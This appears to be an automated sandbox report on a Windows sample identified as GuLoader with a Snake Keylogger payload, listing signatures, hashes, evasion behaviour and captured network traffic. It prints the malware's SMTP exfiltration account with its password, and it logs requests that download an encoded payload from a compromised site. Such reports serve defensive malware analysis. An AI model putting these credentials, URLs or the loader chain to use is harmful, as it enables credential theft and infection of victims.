Windows Analysis Report
LPO-9180155-PDF.exe

Overview

General Information

Sample name: LPO-9180155-PDF.exe
Analysis ID: 1481498
MD5: 3755ce1468a267b6e1084c8069b54a8c
SHA1: 5473fb79e1d8d4089a62a8e5fd120068aac6be59
SHA256: 37f65665252e8b5cc41b3a3a8e2c539141f24f347a86332415a4e1af69d5bc0c
Tags: exesigned
Infos:

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Powershell drops PE file
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Found malware configuration
Source: 00000006.00000002.2674791850.0000000021461000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sendqvivid@xiagin.shop", "Password": "KdPl62NueMA3", "Host": "xiagin.shop", "Port": "587"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe ReversingLabs: Detection: 34%
Multi AV Scanner detection for submitted file
Source: LPO-9180155-PDF.exe ReversingLabs: Detection: 34%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: LPO-9180155-PDF.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:59961 version: TLS 1.0
Source: unknown HTTPS traffic detected: 108.167.181.251:443 -> 192.168.2.5:59959 version: TLS 1.2
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2547109082.0000000008429000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb55qr source: powershell.exe, 00000002.00000002.2544370653.000000000734E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: stem.Core.pdb$ source: powershell.exe, 00000002.00000002.2544370653.00000000073E2000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405770
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Code function: 0_2_0040622B FindFirstFileW,FindClose, 0_2_0040622B
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Code function: 0_2_0040276E FindFirstFileW, 0_2_0040276E
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Code function: 6_2_0040276E FindFirstFileW, 6_2_0040276E
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Code function: 6_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 6_2_00405770
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Code function: 6_2_0040622B FindFirstFileW,FindClose, 6_2_0040622B
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\forgrovelse\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 108.167.181.251 108.167.181.251
Source: Joe Sandbox View IP Address: 132.226.247.73 132.226.247.73
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /wp-includes/IoNHObzRr183.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.reap.skyestates.com.mtCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:59961 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /wp-includes/IoNHObzRr183.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.reap.skyestates.com.mtCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: www.reap.skyestates.com.mt
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: Forbundsstater.exe, 00000006.00000002.2674791850.00000000215C3000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002160C000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215B6000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002161A000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.0000000021523000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.com
Source: Forbundsstater.exe, 00000006.00000002.2674791850.00000000215C3000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002160C000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.0000000021566000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215B6000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215EC000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002161A000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.0000000021517000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.0000000021523000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: Forbundsstater.exe, 00000006.00000002.2674791850.0000000021461000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: LPO-9180155-PDF.exe, Forbundsstater.exe.2.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2542661803.0000000005B28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2539524436.0000000004C16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Forbundsstater.exe, 00000006.00000002.2674791850.00000000215C3000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002160C000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002153B000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215B6000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002161A000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://reallyfreegeoip.org
Source: LPO-9180155-PDF.exe, Forbundsstater.exe.2.dr String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: LPO-9180155-PDF.exe, Forbundsstater.exe.2.dr String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000002.00000002.2539524436.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.0000000021461000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: LPO-9180155-PDF.exe, Forbundsstater.exe.2.dr String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: LPO-9180155-PDF.exe, Forbundsstater.exe.2.dr String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: LPO-9180155-PDF.exe, Forbundsstater.exe.2.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 00000002.00000002.2539524436.0000000004C16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2539524436.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBeq
Source: powershell.exe, 00000002.00000002.2542661803.0000000005B28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2542661803.0000000005B28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2542661803.0000000005B28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: LPO-9180155-PDF.exe, Forbundsstater.exe.2.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: LPO-9180155-PDF.exe, Forbundsstater.exe.2.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: LPO-9180155-PDF.exe, Forbundsstater.exe.2.dr String found in binary or memory: https://d.symcb.com/rpa0.
Source: powershell.exe, 00000002.00000002.2539524436.0000000004C16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2542661803.0000000005B28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: Forbundsstater.exe, 00000006.00000002.2674791850.00000000215C3000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002160C000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.0000000021566000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215B6000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002161A000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.0000000021523000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: Forbundsstater.exe, 00000006.00000002.2674791850.0000000021523000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Forbundsstater.exe, 00000006.00000002.2674791850.00000000215D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: Forbundsstater.exe, 00000006.00000002.2674791850.00000000215C3000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002160C000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.0000000021566000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215B6000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.000000002161A000.00000004.00000800.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2674791850.00000000215D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: Forbundsstater.exe, 00000006.00000002.2662544799.0000000005589000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.reap.skyestates.com.mt/
Source: Forbundsstater.exe, 00000006.00000002.2662544799.0000000005589000.00000004.00000020.00020000.00000000.sdmp, Forbundsstater.exe, 00000006.00000002.2662922690.0000000006F20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.reap.skyestates.com.mt/wp-includes/IoNHObzRr183.bin
Source: Forbundsstater.exe, 00000006.00000002.2662544799.0000000005589000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.reap.skyestates.com.mt/wp-includes/IoNHObzRr183.bino
Source: unknown Network traffic detected: HTTP traffic on port 59968 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59974 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59966 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59970 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59968
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59959
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59964
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59966
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59961
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59972
Source: unknown Network traffic detected: HTTP traffic on port 59959 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59974
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59962
Source: unknown Network traffic detected: HTTP traffic on port 59962 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59961 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59970
Source: unknown Network traffic detected: HTTP traffic on port 59964 -> 443
Source: unknown HTTPS traffic detected: 108.167.181.251:443 -> 192.168.2.5:59959 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Code function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004052D1

System Summary
barindex
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Jump to dropped file
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Code function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_00403358
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Code function: 6_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 6_2_00403358
Detected potential crypto function
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Code function: 0_2_00404B0E 0_2_00404B0E
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Code function: 0_2_0040653D 0_2_0040653D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_02FBEAD8 2_2_02FBEAD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_02FBF3A8 2_2_02FBF3A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_02FBE790 2_2_02FBE790
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0754C17E 2_2_0754C17E
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Code function: 6_2_00404B0E 6_2_00404B0E
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Code function: 6_2_0040653D 6_2_0040653D
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Code function: 6_2_00156108 6_2_00156108
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Code function: 6_2_0015C190 6_2_0015C190
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Code function: 6_2_0015B328 6_2_0015B328
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Code function: 6_2_0015C470 6_2_0015C470
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Code function: 6_2_00156730 6_2_00156730
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Code function: 6_2_0015C752 6_2_0015C752
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Code function: 6_2_00159858 6_2_00159858
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Code function: 6_2_0015CA32 6_2_0015CA32
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Code function: 6_2_00154AD9 6_2_00154AD9
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Code function: 6_2_0015BBD2 6_2_0015BBD2
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Code function: 6_2_0015BEB0 6_2_0015BEB0
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Code function: 6_2_0015B4F2 6_2_0015B4F2
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Code function: 6_2_00153572 6_2_00153572
PE / OLE file has an invalid certificate
Source: LPO-9180155-PDF.exe Static PE information: invalid certificate
Uses 32bit PE files
Source: LPO-9180155-PDF.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.evad.winEXE@11/12@3/3
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Code function: 0_2_004045C8 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004045C8
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Code function: 0_2_0040206A CoCreateInstance, 0_2_0040206A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5360:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1720:120:WilError_03
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe File created: C:\Users\user\AppData\Local\Temp\nsv301B.tmp Jump to behavior
Source: LPO-9180155-PDF.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: LPO-9180155-PDF.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe File read: C:\Users\user\Desktop\LPO-9180155-PDF.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\LPO-9180155-PDF.exe "C:\Users\user\Desktop\LPO-9180155-PDF.exe"
